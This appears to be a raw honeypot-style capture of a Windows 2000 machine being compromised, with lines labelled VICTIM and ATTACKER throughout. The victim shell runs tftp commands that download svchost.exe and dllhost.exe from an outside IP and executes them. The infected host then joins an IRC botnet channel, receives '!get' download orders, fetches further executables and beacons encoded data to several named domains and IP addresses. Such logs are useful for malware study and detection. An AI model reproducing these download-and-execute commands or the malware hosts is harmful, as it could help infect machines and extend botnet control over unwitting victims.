Client: dir dllcache\\\\tftpd.exe; Client: tftp -i 202.124.5.37 get svchost.exe wins\\\\SVCHOST.EXE


VICTIM:  	Microsoft Windows 2000 [Version 5.00.2195] 
VICTIM:  	(C) Copyright 1985-2000 Microsoft Corp.C:\\WINNT\\system32> 
VICTIM:  	dir wins\\dllhost.exe 
VICTIM:  	 Volume in drive C has no label. Volume Serial Number is F07B-A028 Directory of C:\\WINNT\\system32\\winsFile Not FoundC:\\WINNT\\system32> 
VICTIM:  	dir dllcache\\tftpd.exe 
VICTIM:  	 Volume in drive C has no label. Volume Serial Number is F07B-A028 Directory of C:\\WINNT\\system32\\dllcacheFile Not FoundC:\\WINNT\\system32> 
VICTIM:  	tftp -i 202.124.5.37 get svchost.exe wins\\SVCHOST.EXE 
VICTIM:  	\000\001svchost.exe\000octet\000 
VICTIM:  	\000\004\000\001 
VICTIM:  	\000\004\000\002 
VICTIM:  	\000\004\000\003 
VICTIM:  	\000\004\000\004 
VICTIM:  	\000\004\000\005 
VICTIM:  	\000\004\000\006 
VICTIM:  	\000\004\000\007 
VICTIM:  	\000\004\000\010 
VICTIM:  	\000\004\000\t 
VICTIM:  	\000\004\000 
VICTIM:  	\000\004\000\013 
VICTIM:  	\000\004\000\014 
VICTIM:  	\000\004\000\014 
VICTIM:  	\000\004\000 
VICTIM:  	\000\004\000 
VICTIM:  	\000\004\000\016 
VICTIM:  	\000\004\000\017 
VICTIM:  	\000\004\000\020 
VICTIM:  	\000\004\000\021 
VICTIM:  	\000\004\000\022 
VICTIM:  	\000\004\000\023 
VICTIM:  	\000\004\000\024 
VICTIM:  	\000\004\000\025 
VICTIM:  	\000\004\000\026 
VICTIM:  	\000\004\000\027 
VICTIM:  	\000\004\000\030 
VICTIM:  	\000\004\000\031 
VICTIM:  	\000\004\000\032 
VICTIM:  	\000\004\000\033 
VICTIM:  	\000\004\000\034 
VICTIM:  	\000\004\000\035 
VICTIM:  	\000\004\000\036 
VICTIM:  	\000\004\000\037 
VICTIM:  	\000\004\000  
VICTIM:  	\000\004\000! 
VICTIM:  	\000\004\000\ 
VICTIM:  	\000\004\000# 
VICTIM:  	\000\004\000\$ 
VICTIM:  	\000\004\000% 
VICTIM:  	\000\004\000& 
VICTIM:  	\000\004\000' 
VICTIM:  	\000\004\000( 
VICTIM:  	\000\004\000) 
VICTIM:  	\000\004\000* 
VICTIM:  	\000\004\000+ 
VICTIM:  	\000\004\000, 
VICTIM:  	\000\004\000- 
VICTIM:  	\000\004\000. 
VICTIM:  	\000\004\000/ 
VICTIM:  	\000\004\0000 
VICTIM:  	\000\004\0001 
VICTIM:  	\000\004\0002 
VICTIM:  	Transfer successful: 25360 bytes in 9 seconds, 2817 bytes/s 
VICTIM:  	C:\\WINNT\\system32> 
VICTIM:  	\000\001dllhost.exe\000octet\000 
VICTIM:  	tftp -i 202.124.5.37 get dllhost.exe wins\\DLLHOST.EXE 
VICTIM:  	\000\004\000\001 
VICTIM:  	\000\004\000\002 
VICTIM:  	\000\004\000\003 
VICTIM:  	\000\004\000\004 
VICTIM:  	\000\004\000\005 
VICTIM:  	\000\004\000\006 
VICTIM:  	\000\004\000\007 
VICTIM:  	\000\004\000\010 
VICTIM:  	\000\004\000\t 
VICTIM:  	\000\004\000 
VICTIM:  	\000\004\000\013 
VICTIM:  	\000\004\000\014 
VICTIM:  	\000\004\000 
VICTIM:  	\000\004\000\016 
VICTIM:  	\000\004\000\017 
VICTIM:  	\000\004\000\020 
VICTIM:  	\000\004\000\021 
VICTIM:  	\000\004\000\022 
VICTIM:  	\000\004\000\023 
VICTIM:  	\000\004\000\024 
VICTIM:  	\000\004\000\025 
VICTIM:  	\000\004\000\026 
VICTIM:  	\000\004\000\027 
VICTIM:  	\000\004\000\030 
VICTIM:  	\000\004\000\031 
VICTIM:  	\000\004\000\032 
VICTIM:  	\000\004\000\033 
VICTIM:  	\000\004\000\034 
VICTIM:  	\000\004\000\035 
VICTIM:  	\000\004\000\036 
VICTIM:  	\000\004\000\037 
VICTIM:  	\000\004\000  
VICTIM:  	Transfer successful: 15872 bytes in 5 seconds, 3174 bytes/s 
VICTIM:  	C:\\WINNT\\system32> 
VICTIM:  	wins\\DLLHOST.EXE 
VICTIM:  	NICK tjkyxuurUSER y020500 . . :_ 
VICTIM:  	Service Pack 2JOIN &virtu 
ATTACKER:	:u. PRIVMSG tjkyxuur :!get http:/bb.iwillhavebigdick.com/kp.exe:u. PRIVMSG tjkyxuur :!get http:/www.derquda.com/kb8.txt 
VICTIM:  	GET /kp.exe HTTP/1.0User-Agent: DownloadHost: bb.iwillhavebigdick.comPragma: no-cache 
ATTACKER:	GET /kb8.txt HTTP/1.0User-Agent: DownloadHost: www.derquda.comPragma: no-cache 
ATTACKER:	GET /ert/mno3.txt HTTP/1.0User-Agent: Microsoft Internet ExplorerHost: www.derquda.comPragma: no-cache 
ATTACKER:	GET /ert/lmn2.txt HTTP/1.0User-Agent: Microsoft Internet ExplorerHost: www.derquda.comPragma: no-cache 
ATTACKER:	GET /ert/klm1.txt HTTP/1.0User-Agent: Microsoft Internet ExplorerHost: www.derquda.comPragma: no-cache 
ATTACKER:	GET /ert/nop4.txt HTTP/1.0User-Agent: Microsoft Internet ExplorerHost: www.derquda.comPragma: no-cache 
ATTACKER:	GET /list.php?c=AEB60ADDBD0BBF131BFCCAE2A7E2C819EF76C7FC85B6EB7688CA3663CC6B9FB6132DDFC22E5999F7FF86C75DB4F194B6B2480DFA0C754E147A15&v=2&t=0.7380182 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)Host: exe3.perfectexe.com:255Connection: Keep-AlivePragma: no-cache 
ATTACKER:	GET /cs.gif?t=0.829632 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)Host: sb.perfectexe.comConnection: Keep-AlivePragma: no-cache 
ATTACKER:	GET /list.php?c=5D45EE3941F7A20E25C29EB65C1918C9B029764DA794F4691B596D3857F06E47556B0A17DEA9FB958CF5128804411331E51F6394394036677004&v=2&t=0.046673 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)Host: bestkind.ruConnection: Keep-AlivePragma: no-cache 
ATTACKER:	GET /upload/int.exe?t=0.7065851 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)Host: anotherdomainname.inConnection: Keep-AlivePragma: no-cache 
ATTACKER:	GET /sn.php?c=2A34C0240D9DAA0D37DC96BEDDA78B7AE873C8FDAE8B1BD76C0AE291B413527C2C62B4A34927B1EFF39BED873239799452A4EB5324551C3B437BD27A86FEF19A0C71DCA4797C2BB4665CF08A16F80CD3DF287548F68856507DDF6805F8010379A4C5ACB23E2535A8398AA225797970EA08FFFAD567200720633AC9A6992FD46A0C07DB787A492CEC55634A198D4D1269&t=0.4770319 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)Host: exe3.perfectexe.com:255Connection: Keep-AlivePragma: no-cache 
ATTACKER:	GET /sn.php?c=5947C723B929E34457BC4E66E3996998F8631B2EB491905CF4920F7C58FF634D7D33ACBB1A7490CEDBB3274D2A2119F454A2BF079EEF4D6A4E764EE6B6CEF79CB7CA1E666461D54AA59FFD870CE24C933ACD94A988F6595FCB69F4996F96CBB14120726C978CB02DBF0CB523D8210D8584710D531340D2E01400067373D10CF692823E98F3C35D9C7145732021E9A9294B90&t=0.8495905 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)Host: exe3.perfectexe.com:255Connection: Keep-AlivePragma: no-cache 
ATTACKER:	GET /state.php?action=install&m=00-0C-29-F7-BD-23 HTTP/1.1User-Agent: NetLog2Host: sy2.perfectexe.com:85Pragma: no-cache 
ATTACKER:	GET /sn.php?c=D2CC6286BB2BC510DB36AC82ECA4478751F197AD8AAA9156492F6F2700A56F462D578891A8EAE6C8BFD42C45EBD5C72A5AACD960A93785A37B48A903DBA6442A81D0126977A632ADB18BCFB5937D1AC57D8A1E23CEB0363006A42C41EC15453FDFBECED0C0DBDE4314A771F64F4F049E6B9C547B3275FADDE9B0F49B3C8A59E7989CC8645D725F9A88B92F7F&t=0.5585138 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)Host: bestkind.ruConnection: Keep-AlivePragma: no-cache 
ATTACKER:	GET /sn.php?c=4B55BB5F04940EDB37DA1638D69E28E86ECE1D27FFDF36F1ED8BE6AE0AAF220B413BE1F87A38F4DAA5CE68010E3000ED6B9D972E43DD5E789DAE5DF719649BF5E3B2D3A81ACBAE31A79DCDB799772EF1788FAF923846C2C4AC0E83EEAC55D8A24A2B4856C5DE9A0726958C1AA8511D954EBB3D635F0CDCEDA5B1BCC99537669CCEDE339F9AAF53904C7B287AAD657C02E705&t=0.8788874 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)Host: bestkind.ruConnection: Keep-AlivePragma: no-cache 
ATTACKER:	GET /1.exe?t=0.6437189 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)Host: 109.196.143.133Connection: Keep-AlivePragma: no-cache 
ATTACKER:	PONG :k. 
VICTIM:  	JOIN &virtu 
ATTACKER:	PONG :k. 
VICTIM:  	JOIN &virtu 
ATTACKER:	PONG :k. 
VICTIM:  	JOIN &virtu